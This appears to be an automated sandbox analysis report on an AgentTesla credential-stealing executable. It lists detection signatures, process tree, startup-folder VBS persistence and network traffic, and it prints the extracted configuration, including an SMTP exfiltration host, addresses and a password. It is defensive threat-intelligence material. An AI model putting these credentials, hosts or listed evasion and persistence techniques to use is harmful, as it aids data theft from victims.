Loading ...

Play interactive tourEdit tour

Analysis Report DOC04121993.exe

Overview

General Information

Sample Name:DOC04121993.exe
Analysis ID:321396
MD5:710843b45a8e65c939d3ab4fb96d73e4
SHA1:909799ac70c5a8a472b40579ff0c5bc982979676
SHA256:d0ea8610ecee6c92c50af51c37a0a49f8550768609a08a5a2dcaf98bb06dcff3
Tags:AgentTesla

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (creates a PE file in dynamic memory)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected AgentTesla
.NET source code contains potential unpacker
Allocates memory in foreign processes
Contains functionality to detect sleep reduction / modifications
Delayed program exit found
Drops VBS files to the startup folder
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queues an APC in another process (thread injection)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains strange resources
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara detected Credential Stealer

Classification

Startup

  • System is w10x64
  • DOC04121993.exe (PID: 2576 cmdline: 'C:\Users\user\Desktop\DOC04121993.exe' MD5: 710843B45A8E65C939D3AB4FB96D73E4)
    • notepad.exe (PID: 4472 cmdline: C:\Windows\system32\notepad.exe MD5: D693F13FE3AA2010B854C4C60671B8E2)
    • DOC04121993.exe (PID: 1000 cmdline: 'C:\Users\user\Desktop\DOC04121993.exe' MD5: 710843B45A8E65C939D3AB4FB96D73E4)
    • DOC04121993.exe (PID: 1832 cmdline: 'C:\Users\user\Desktop\DOC04121993.exe' 2 1000 3714343 MD5: 710843B45A8E65C939D3AB4FB96D73E4)
  • wscript.exe (PID: 2168 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\STARTUP.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • DOC04121993.exe (PID: 5080 cmdline: 'C:\Users\user\Desktop\DOC04121993.exe' MD5: 710843B45A8E65C939D3AB4FB96D73E4)
      • notepad.exe (PID: 780 cmdline: C:\Windows\system32\notepad.exe MD5: D693F13FE3AA2010B854C4C60671B8E2)
      • DOC04121993.exe (PID: 1956 cmdline: 'C:\Users\user\Desktop\DOC04121993.exe' MD5: 710843B45A8E65C939D3AB4FB96D73E4)
      • DOC04121993.exe (PID: 5320 cmdline: 'C:\Users\user\Desktop\DOC04121993.exe' 2 1956 3726421 MD5: 710843B45A8E65C939D3AB4FB96D73E4)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "bq6qu", "URL: ": "http://vd2JBRKVM6n.net", "To: ": "info@hybridgroupco.com", "ByHost: ": "mail.hybridgroupco.com:587", "Password: ": "IhNKJa9", "From: ": "info@hybridgroupco.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.229601884.00000000027C5000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000002.00000002.462629290.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000002.00000002.464088936.00000000009E2000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000000.00000002.199767698.0000000002705000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000002.00000002.464255746.0000000002242000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 16 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            7.2.DOC04121993.exe.2290000.3.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              2.2.DOC04121993.exe.2240000.3.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                7.2.DOC04121993.exe.2150000.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  2.2.DOC04121993.exe.980000.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    7.2.DOC04121993.exe.21b0000.2.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 8 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Drops script at startup locationShow sources
                      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\notepad.exe, ProcessId: 4472, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\STARTUP.vbs

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: DOC04121993.exe.1000.2.memstrMalware Configuration Extractor: Agenttesla {"Username: ": "bq6qu", "URL: ": "http://vd2JBRKVM6n.net", "To: ": "info@hybridgroupco.com", "ByHost: ": "mail.hybridgroupco.com:587", "Password: ": "IhNKJa9", "From: ": "info@hybridgroupco.com"}
                      Multi AV Scanner detection for domain / URLShow sources
                      Source: mail.hybridgroupco.comVirustotal: Detection: 9%Perma Link
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: DOC04121993.exeVirustotal: Detection: 69%Perma Link
                      Source: DOC04121993.exeReversingLabs: Detection: 81%
                      Machine Learning detection for sampleShow sources
                      Source: DOC04121993.exeJoe Sandbox ML: detected
                      Source: 2.2.DOC04121993.exe.2240000.3.unpackAvira: Label: TR/Spy.Gen8
                      Source: 7.2.DOC04121993.exe.2290000.3.unpackAvira: Label: TR/Spy.Gen8
                      Source: 5.2.DOC04121993.exe.2750000.3.unpackAvira: Label: TR/Spy.Gen8
                      Source: 0.2.DOC04121993.exe.22e0000.2.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 7.2.DOC04121993.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_00408978 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_00408A78 FindFirstFileA,GetLastError,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_00405B54 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 3_2_00408978 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 3_2_00408A78 FindFirstFileA,GetLastError,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 3_2_00405B54 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 5_2_00408978 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 5_2_00408A78 FindFirstFileA,GetLastError,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 5_2_00405B54 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 8_2_00408978 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 8_2_00408A78 FindFirstFileA,GetLastError,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 8_2_00405B54 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
                      Source: global trafficTCP traffic: 192.168.2.3:49731 -> 66.70.204.222:587
                      Source: Joe Sandbox ViewIP Address: 66.70.204.222 66.70.204.222
                      Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
                      Source: global trafficTCP traffic: 192.168.2.3:49731 -> 66.70.204.222:587
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_0233A186 recv,
                      Source: unknownDNS traffic detected: queries for: mail.hybridgroupco.com
                      Source: DOC04121993.exe, DOC04121993.exe, 00000007.00000002.223712280.0000000000475000.00000040.00000001.sdmpString found in binary or memory: http://127.0.0.1:
                      Source: DOC04121993.exe, 00000002.00000002.468167788.0000000002C9E000.00000004.00000001.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
                      Source: DOC04121993.exe, 00000002.00000002.468167788.0000000002C9E000.00000004.00000001.sdmpString found in binary or memory: http://cert.int-x3.letsencrypt.org/0
                      Source: DOC04121993.exe, 00000002.00000002.468167788.0000000002C9E000.00000004.00000001.sdmpString found in binary or memory: http://cps.letsencrypt.org0
                      Source: DOC04121993.exe, 00000002.00000002.468167788.0000000002C9E000.00000004.00000001.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org0
                      Source: DOC04121993.exe, 00000002.00000002.468167788.0000000002C9E000.00000004.00000001.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
                      Source: DOC04121993.exe, 00000002.00000002.468167788.0000000002C9E000.00000004.00000001.sdmpString found in binary or memory: http://isrg.trustid.ocsp.identrust.com0;
                      Source: DOC04121993.exe, 00000002.00000002.468167788.0000000002C9E000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.int-x3.letsencrypt.org0/
                      Source: DOC04121993.exe, 00000002.00000002.467888799.0000000002B70000.00000004.00000001.sdmpString found in binary or memory: http://vd2JBRKVM6n.net
                      Source: DOC04121993.exe, 00000002.00000002.467655668.0000000002A92000.00000004.00000001.sdmpString found in binary or memory: http://vd2JBRKVM6n.net$
                      Source: DOC04121993.exe, DOC04121993.exe, 00000007.00000002.223712280.0000000000475000.00000040.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot%telegramapi%/
                      Source: DOC04121993.exeString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/
                      Source: DOC04121993.exeString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: DOC04121993.exe, 00000000.00000002.199767698.0000000002705000.00000040.00000001.sdmp, DOC04121993.exe, 00000002.00000002.462629290.0000000000402000.00000040.00000001.sdmp, DOC04121993.exe, 00000005.00000002.229601884.00000000027C5000.00000040.00000001.sdmp, DOC04121993.exe, 00000007.00000002.223712280.0000000000475000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/U
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_004070F2 OpenClipboard,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_00422CC4 GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 3_2_00423308 GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_0045E108 GetKeyboardState,SetKeyboardState,SendMessageA,SendMessageA,
                      Source: DOC04121993.exe, 00000000.00000002.198945887.000000000084A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      System Summary:

                      barindex
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_0045AACC NtdllDefWindowProc_A,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_0045B248 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_0045B2F8 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_0044F67C GetSubMenu,SaveDC,RestoreDC,73BBB080,SaveDC,RestoreDC,NtdllDefWindowProc_A,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_00433DC8 NtdllDefWindowProc_A,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_0043FF18 NtdllDefWindowProc_A,GetCapture,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_0046E159 NtCreateSection,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_0233B362 NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_0233B331 NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 3_2_0045AACC NtdllDefWindowProc_A,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 3_2_0045B248 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 3_2_0045B2F8 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 3_2_0044F67C GetSubMenu,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 3_2_00433DC8 NtdllDefWindowProc_A,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 3_2_0043FF18 NtdllDefWindowProc_A,GetCapture,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 5_2_0045AACC NtdllDefWindowProc_A,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 5_2_0045B248 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 5_2_0045B2F8 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 5_2_0044F67C GetSubMenu,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 5_2_00433DC8 NtdllDefWindowProc_A,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 5_2_0043FF18 NtdllDefWindowProc_A,GetCapture,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_004551A0
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_0044F67C
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_00467976
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_0046D13D
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_04E3B6E8
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_04E33468
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_04E3702E
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_04E20007
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_04E39010
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_04E331F8
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_04E3DBB8
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_04E39388
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_04E37990
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_04E31568
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_04E31D20
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_04E3CB3F
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_04E3810F
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_04E3C8EB
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_04E39CFE
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_04E3C8AF
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_04E384B1
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_04E328B8
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_04E348BE
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_04E3C889
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_04E32099
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_04E37A98
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_04E3566C
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_04E36A72
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_04E3C877
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_04E37E78
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_04E36C35
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_04E39000
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_04E33468
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_04E355D3
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_04E3A3A2
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_04E3DBA9
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_04E357AD
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_04E38998
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_04E39378
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_04E3155A
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_04E32136
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_04E3553A
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_04E39D03
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_04E39D08
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_04E31D10
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_05AE07F0
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_05AE59C8
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_05AE0D10
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_05AE7710
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_05AE5370
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_05AE3740
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_05AE1CC0
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_05AE7E08
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_05AE8648
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_05AE0DBB
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_05AE7DF8
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_05AE63CC
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_05AE0DCD
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_05AE07D3
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_05AE3731
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_05AE7703
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_05AE1115
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_05AE1EA3
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_05AE72BC
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_05AE1CB0
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_05AE7E87
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_05AE0E93
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_05AE0CF9
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_05AE08D6
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_05AE0A2A
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_05AE2414
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_05AE0E6A
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_05B5A148
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_05B5AED0
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_05B5EAD0
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_05B5BE50
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_05B5B250
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 3_2_004551A0
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 3_2_0044F67C
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 5_2_004551A0
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 5_2_0044F67C
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 7_2_00467976
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 7_2_0046D13D
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 8_2_004551A0
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 8_2_0044F67C
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: String function: 00467F3C appears 33 times
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: String function: 004264A4 appears 36 times
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: String function: 00413454 appears 32 times
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: String function: 004145C0 appears 40 times
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: String function: 00403648 appears 113 times
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: String function: 0040274C appears 38 times
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: String function: 00404AA4 appears 40 times
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: String function: 0041E128 appears 32 times
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: String function: 0041E918 appears 36 times
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: String function: 00403A14 appears 131 times
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: String function: 0040674C appears 64 times
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: String function: 00403E90 appears 53 times
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: String function: 004043D8 appears 69 times
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: String function: 0040699C appears 52 times
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: String function: 004060E8 appears 40 times
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: String function: 0040C464 appears 72 times
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: String function: 004043B4 appears 309 times
                      Source: DOC04121993.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                      Source: DOC04121993.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                      Source: DOC04121993.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                      Source: DOC04121993.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                      Source: DOC04121993.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                      Source: DOC04121993.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                      Source: DOC04121993.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                      Source: DOC04121993.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                      Source: DOC04121993.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                      Source: DOC04121993.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                      Source: DOC04121993.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                      Source: DOC04121993.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                      Source: DOC04121993.exe, 00000000.00000002.199905445.0000000002766000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameyZFlSsyWYLpOIrYUuUqNGPSmFjhfv.exe4 vs DOC04121993.exe
                      Source: DOC04121993.exe, 00000000.00000002.198869393.00000000006B0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs DOC04121993.exe
                      Source: DOC04121993.exeBinary or memory string: OriginalFilename vs DOC04121993.exe
                      Source: DOC04121993.exe, 00000002.00000002.462629290.0000000000402000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameyZFlSsyWYLpOIrYUuUqNGPSmFjhfv.exe4 vs DOC04121993.exe
                      Source: DOC04121993.exe, 00000002.00000002.468977606.00000000059E0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewshom.ocx.mui vs DOC04121993.exe
                      Source: DOC04121993.exe, 00000002.00000002.468721906.0000000005350000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs DOC04121993.exe
                      Source: DOC04121993.exe, 00000003.00000002.224468567.0000000002160000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs DOC04121993.exe
                      Source: DOC04121993.exe, 00000005.00000002.229601884.00000000027C5000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameyZFlSsyWYLpOIrYUuUqNGPSmFjhfv.exe4 vs DOC04121993.exe
                      Source: DOC04121993.exe, 00000005.00000002.226401330.0000000002170000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs DOC04121993.exe
                      Source: DOC04121993.exeBinary or memory string: OriginalFilename vs DOC04121993.exe
                      Source: DOC04121993.exe, 00000007.00000001.223556134.00000000004D6000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameyZFlSsyWYLpOIrYUuUqNGPSmFjhfv.exe4 vs DOC04121993.exe
                      Source: 0.2.DOC04121993.exe.2690000.3.unpack, gtu.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.DOC04121993.exe.2690000.3.unpack, gtu.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
